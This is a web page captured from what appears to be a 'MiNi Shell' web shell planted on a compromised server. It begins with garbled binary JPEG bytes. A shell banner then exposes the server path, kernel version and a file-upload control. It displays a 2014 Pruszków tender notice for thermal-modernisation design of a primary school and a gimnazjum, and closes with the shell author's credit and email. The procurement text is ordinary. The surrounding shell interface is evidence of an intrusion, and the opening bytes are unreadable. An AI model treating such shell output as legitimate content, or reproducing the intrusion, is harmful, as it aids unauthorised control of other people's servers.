JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141009/334726-N-2014.html

<p class="kh_header"><b>Pruszków: zadanie nr 1 - wykonanie dokumentacji projektowej na termomodernizację budynku 
                        Szkoły Podstawowej nr 6 przy ulicy Lipowej 31 w Pruszkowie,
zadanie nr 2 - wykonanie dokumentacji projektowej na termomodernizację budynku
                      Gimnazjum nr 4 przy ulicy Hubala 4 w Pruszkowie</b><br>
<b>Numer ogłoszenia: 334726 - 2014; data zamieszczenia: 09.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Pruszków , ul. Kraszewskiego 14/16, 05-800 Pruszków, woj. mazowieckie, tel. 022 7587244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zadanie nr 1 - wykonanie dokumentacji projektowej na termomodernizację budynku 
                        Szkoły Podstawowej nr 6 przy ulicy Lipowej 31 w Pruszkowie,
zadanie nr 2 - wykonanie dokumentacji projektowej na termomodernizację budynku
                      Gimnazjum nr 4 przy ulicy Hubala 4 w Pruszkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

zadanie nr 1 
- wykonanie dokumentacji projektowej na termomodernizację budynku Szkoły Podstawowej nr 6 
    przy ulicy Lipowej 31 w Pruszkowie,

Podstawowe dane obiektu:
  - lokalizacja ul. Lipowa 31, 05-800 Pruszków,
  - kubatura 13100 m3,
  - powierzchnia zabudowy 1473 m2,
  - powierzchnia netto budynku 3853 m2,
  - ilość kondygnacji mieszana 4/3
  - budynek częściowo podpiwniczony

w zakresie:
1. wykonania koniecznej inwentaryzacji budowlanej w zakresie niezbędnym do realizacji dokumentacji, 
2. wykonania koncepcji architektoniczno- budowlanej /Wykonawca uzyska akceptację koncepcji przez
      Zamawiającego/
3. wykonania projektu budowlanego i wykonawczego:
   a/ termomodernizacji budynku w oparciu o audyt energetyczny uwzględniając między innymi wykonanie:
         - charakterystyki energetycznej budynku 
         - docieplenie ścian zewnętrznych / w tym fundamentowych/,
         - docieplenie stropodachów,
         - wymianę rynien, rur spustowych, obróbek blacharskich, parapetów zewnętrznych,
         - remont/wymiana daszków i schodów zewnętrznych,
         - wymianę drzwi  zewnętrznych,
         - wymianę oświetlenia zewnętrznego budynku
         - izolacji przeciwwodnej ścian piwnic i fundamentowych,
         - wykonanie opaski wokół budynku,
         - likwidacji, wymiany lub wykonania i montażu nowych zewnętrznych krat okiennych /zakres do
            uzgodnienia z użytkownikiem/
    b/ instalacji odgromowej, 
    c/ odprowadzenia wód deszczowych do sieci na terenie lub miejskiej,
    d) wymiany instalacji centralnego ogrzewania,
4. wykonania ewentualnej inwentaryzacji przyrodniczej ze szczególnym uwzględnieniem miejsc lęgowych 
     ptaków,
5. wykonanie projektu organizacji ruchu na terenie budowy na czas wykonywania robót /wytyczne dla 
      wykonawcy robót/,
6. wykonanie przedmiarów robót, kosztorysów inwestorskich, specyfikacji technicznych wykonania i odbioru 
     robót, zbiorczego zestawienia kosztów( ZZK),
7. uzyskania w imieniu Zamawiającego decyzji pozwolenia na budowę, 
8. pełnienie nadzoru autorskiego.


zadanie nr 2
- wykonanie dokumentacji projektowej na termomodernizację budynku Gimnazjum nr 4 
    przy ulicy Hubala 4 w Pruszkowie,
    
Podstawowe dane obiektu:
  - lokalizacja ul. Hubala 4, 05-800 Pruszków,
  - kubatura 7374 m3,
  - powierzchnia zabudowy 725  m2,
  - powierzchnia netto budynku  2304  m2,
  - ilość kondygnacji 4,
  - budynek częściowo podpiwniczony

w zakresie:
  1. wykonania koniecznej inwentaryzacji budowlanej w zakresie niezbędnym do realizacji dokumentacji, 
  2. wykonania koncepcji architektoniczno- budowlanej  /Wykonawca uzyska akceptację  
             koncepcji przez Zamawiającego/
  3. wykonania projektu budowlanego i wykonawczego:
    a/ termomodernizacji budynku w oparciu o audyt energetyczny uwzględniając między innymi wykonanie:
         - charakterystyki energetycznej budynku 
         - docieplenie ścian zewnętrznych / w tym fundamentowych wraz z remontem/ wymianą studzienek 
            doświetlających/,
         - docieplenie stropodachu,
         - wymianę rynien, rur spustowych, obróbek blacharskich, parapetów zewnętrznych,
         - remont/wymiana daszków i schodów zewnętrznych,
         - wymianę drzwi  zewnętrznych,
         - wymianę oświetlenia zewnętrznego budynku,
         - izolacji przeciwwodnej ścian piwnic i fundamentowych,
         - wykonanie opaski wokół budynku,
         - przebudowa ścian klatek schodowych z pustaków szklanych,
         - likwidacji, wymiany lub wykonania i montażu nowych zewnętrznych krat okiennych /zakres do 
            uzgodnienia z użytkownikiem/
     b/ instalacji odgromowej, 
     c/ odprowadzenia wód deszczowych do sieci na terenie, 
     d) wymiany instalacji centralnego ogrzewania,
  4. wykonania ewentualnej inwentaryzacji przyrodniczej ze szczególnym uwzględnieniem miejsc lęgowych
       ptaków,
  5. wykonanie projektu organizacji ruchu na terenie budowy na czas wykonywania robót /wytyczne dla
       wykonawcy robót/,
  6. wykonanie przedmiarów robót, kosztorysów inwestorskich, specyfikacji technicznych wykonania i odbioru 
       robót, zbiorczego zestawienia kosztów( ZZK),
  7. uzyskania w imieniu Zamawiającego decyzji pozwolenia na budowę, 
  8. pełnienie nadzoru autorskiego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6. ustawy w okresie 3 lat od udzielenia zamówienia podstawowego wybranemu wykonawcy, które stanowić będą nie więcej niż 50% wartości zamówienia podstawowego i będą polegały na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożone oświadczenie o spełnianiu warunku udziału w postępowaniu określonego w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony, jeżeli Wykonawca wykaże się wykonaniem głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonanych należycie w tym: 
- nie mniej niż 2 zamówienia odpowiadające swoim rodzajem pracom projektowym stanowiącym przedmiot zamówienia tj.: projekty termomodernizacji budynków.
Każda przedstawiona praca musi mieć wartość min. 40 000,00zł.

3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania
Zamówienia. 
Warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie uznany za spełniony jeżeli Wykonawca wykaże się - dysponowaniem osobami zdolnymi do wykonania zamówienia w tym minimum:

            dla  Zadania nr 1:
- 2 osoby (Projektant i Sprawdzający) posiadające uprawnienia bez ograniczeń do projektowania 
                                                       w specjalności konstrukcyjno-budowlanej i architektonicznej,
- 2 osoby (Projektant i Sprawdzający) posiadające uprawnienia bez ograniczeń do projektowania 
            w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
                                                                                                  i elektroenergetycznych,
- 2 osoby (Projektant i Sprawdzający) posiadające uprawnienia bez ograniczeń do projektowania 
                                       w zakresie sieci i instalacji i urządzeń: wodociągowych i kanalizacyjnych, 
wpisanymi na listę członków właściwej Regionalnej Izby Samorządu Zawodowego.

            dla  Zadania nr 2:
- 2 osoby (Projektant i Sprawdzający) posiadające uprawnienia bez ograniczeń do projektowania 
                                                       w specjalności konstrukcyjno-budowlanej i architektonicznej,
- 2 osoby (Projektant i Sprawdzający) posiadające uprawnienia bez ograniczeń do projektowania 
            w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
                                                                                                  i elektroenergetycznych,
- 2 osoby (Projektant i Sprawdzający) posiadające uprawnienia bez ograniczeń do projektowania 
                                       w zakresie sieci i instalacji i urządzeń: wodociągowych i kanalizacyjnych, 
wpisanymi na listę członków właściwej Regionalnej Izby Samorządu Zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożone oświadczenie o spełnianiu warunku udziału w postępowaniu określonego w art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- nie mniej niż 2 zamówienia odpowiadające swoim rodzajem pracom projektowym stanowiącym przedmiot zamówienia tj.: projekty termomodernizacji budynków.
Każda przedstawiona praca musi mieć wartość min. 40 000,00zł.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę

1) Formularz ofertowy (według załączonego druku) 

2) Upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawcy 
     UWAGA: dołączone wtedy o ile nie wynika z załączonych dokumentów 

3) Wykaz prac, które Wykonawca zamierza powierzyć podwykonawcom (jeżeli przewiduje udział podwykonawców w realizacji zamówienia), lub poda nazwy (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do
     treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach tj.:
- konieczności wprowadzenia zmian projektowych lub technologicznych.
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych 
   przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
- z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez 
   doświadczonego Wykonawcę usług,
- z powodu przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione. 
- z powodu wystąpienia okoliczności nie zawinionych przez strony,  których nie można było wcześniej przewidzieć,
- w przypadku zmiany kluczowego personelu Wykonawcy lub Zamawiającego.
- wystąpienia obiektywnych zmian ocenianych jako korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> cena wersji papierowej - 39,00 PLN
Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
Biuro Zamówień Publicznych
pok. 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2014 godzina 12:00, miejsce: Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1 
- wykonanie dokumentacji projektowej na termomodernizację budynku Szkoły Podstawowej nr 6 przy ulicy Lipowej 31 w Pruszkowie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawowe dane obiektu:
  - lokalizacja ul. Lipowa 31, 05-800 Pruszków,
  - kubatura 13100 m3,
  - powierzchnia zabudowy 1473 m2,
  - powierzchnia netto budynku 3853 m2,
  - ilość kondygnacji mieszana 4/3
  - budynek częściowo podpiwniczony

w zakresie:
1. wykonania koniecznej inwentaryzacji budowlanej w zakresie niezbędnym do realizacji dokumentacji, 
2. wykonania koncepcji architektoniczno- budowlanej /Wykonawca uzyska akceptację koncepcji przez
      Zamawiającego/
3. wykonania projektu budowlanego i wykonawczego:
   a/ termomodernizacji budynku w oparciu o audyt energetyczny uwzględniając między innymi wykonanie:
         - charakterystyki energetycznej budynku 
         - docieplenie ścian zewnętrznych / w tym fundamentowych/,
         - docieplenie stropodachów,
         - wymianę rynien, rur spustowych, obróbek blacharskich, parapetów zewnętrznych,
         - remont/wymiana daszków i schodów zewnętrznych,
         - wymianę drzwi  zewnętrznych,
         - wymianę oświetlenia zewnętrznego budynku
         - izolacji przeciwwodnej ścian piwnic i fundamentowych,
         - wykonanie opaski wokół budynku,
         - likwidacji, wymiany lub wykonania i montażu nowych zewnętrznych krat okiennych /zakres do
            uzgodnienia z użytkownikiem/
    b/ instalacji odgromowej, 
    c/ odprowadzenia wód deszczowych do sieci na terenie lub miejskiej,
    d) wymiany instalacji centralnego ogrzewania,
4. wykonania ewentualnej inwentaryzacji przyrodniczej ze szczególnym uwzględnieniem miejsc lęgowych 
     ptaków,
5. wykonanie projektu organizacji ruchu na terenie budowy na czas wykonywania robót /wytyczne dla 
      wykonawcy robót/,
6. wykonanie przedmiarów robót, kosztorysów inwestorskich, specyfikacji technicznych wykonania i odbioru 
     robót, zbiorczego zestawienia kosztów( ZZK),
7. uzyskania w imieniu Zamawiającego decyzji pozwolenia na budowę, 
8. pełnienie nadzoru autorskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2
- wykonanie dokumentacji projektowej na termomodernizację budynku Gimnazjum nr 4 
    przy ulicy Hubala 4 w Pruszkowie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawowe dane obiektu:
  - lokalizacja ul. Hubala 4, 05-800 Pruszków,
  - kubatura 7374 m3,
  - powierzchnia zabudowy 725  m2,
  - powierzchnia netto budynku  2304  m2,
  - ilość kondygnacji 4,
  - budynek częściowo podpiwniczony

w zakresie:
  1. wykonania koniecznej inwentaryzacji budowlanej w zakresie niezbędnym do realizacji dokumentacji, 
  2. wykonania koncepcji architektoniczno- budowlanej  /Wykonawca uzyska akceptację  
             koncepcji przez Zamawiającego/
  3. wykonania projektu budowlanego i wykonawczego:
    a/ termomodernizacji budynku w oparciu o audyt energetyczny uwzględniając między innymi wykonanie:
         - charakterystyki energetycznej budynku 
         - docieplenie ścian zewnętrznych / w tym fundamentowych wraz z remontem/ wymianą studzienek 
            doświetlających/,
         - docieplenie stropodachu,
         - wymianę rynien, rur spustowych, obróbek blacharskich, parapetów zewnętrznych,
         - remont/wymiana daszków i schodów zewnętrznych,
         - wymianę drzwi  zewnętrznych,
         - wymianę oświetlenia zewnętrznego budynku,
         - izolacji przeciwwodnej ścian piwnic i fundamentowych,
         - wykonanie opaski wokół budynku,
         - przebudowa ścian klatek schodowych z pustaków szklanych,
         - likwidacji, wymiany lub wykonania i montażu nowych zewnętrznych krat okiennych /zakres do 
            uzgodnienia z użytkownikiem/
     b/ instalacji odgromowej, 
     c/ odprowadzenia wód deszczowych do sieci na terenie, 
     d) wymiany instalacji centralnego ogrzewania,
  4. wykonania ewentualnej inwentaryzacji przyrodniczej ze szczególnym uwzględnieniem miejsc lęgowych
       ptaków,
  5. wykonanie projektu organizacji ruchu na terenie budowy na czas wykonywania robót /wytyczne dla
       wykonawcy robót/,
  6. wykonanie przedmiarów robót, kosztorysów inwestorskich, specyfikacji technicznych wykonania i odbioru 
       robót, zbiorczego zestawienia kosztów( ZZK),
  7. uzyskania w imieniu Zamawiającego decyzji pozwolenia na budowę, 
  8. pełnienie nadzoru autorskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com